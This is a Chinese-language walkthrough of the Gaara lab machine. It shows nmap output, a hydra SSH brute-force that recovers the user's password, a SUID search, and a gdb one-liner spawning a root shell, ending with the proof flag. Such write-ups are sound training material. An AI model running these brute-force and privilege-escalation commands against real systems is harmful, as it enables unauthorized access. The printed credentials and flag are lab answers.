主要知识点
- hydra爆破
- SUID提权
具体步骤
nmap来查看一下开放哪些端口和服务,比较直接,只有22和80
Nmap scan report for 192.168.171.142
Host is up (0.40s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
但是无论执行路径爆破或者nikto 都没有任何有价值的收获,只能把注意力放在ssh爆破上了,这里有个很显著的用户名 gaara
使用hydra爆破一下,成功得到了密码iloveyou2
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-26 12:03:28
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking ssh://192.168.171.142:22/
[STATUS] 212.00 tries/min, 212 tries in 00:01h, 9790 to do in 00:47h, 14 active
[STATUS] 195.67 tries/min, 587 tries in 00:03h, 9415 to do in 00:49h, 14 active
[STATUS] 187.14 tries/min, 1310 tries in 00:07h, 8692 to do in 00:47h, 14 active
[STATUS] 183.73 tries/min, 2756 tries in 00:15h, 7247 to do in 00:40h, 13 active
[STATUS] 178.03 tries/min, 5519 tries in 00:31h, 4484 to do in 00:26h, 13 active
[22][ssh] host: 192.168.171.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-26 12:38:38
ssh登录remote server后,查找一下SUID权限的文件,发现了 gdb和gimp-2.10,参考GTFObins的提示,顺利提权,(不过gimp-2.10我这里报错了 :Cannot open display)
gaara@Gaara:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/gdb
/usr/bin/sudo
/usr/bin/gimp-2.10
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
gaara@Gaara:~$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# cat /root/proof.txt
3f46819ec9e47edc98319b4dbf48e311
扫一扫
1382
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
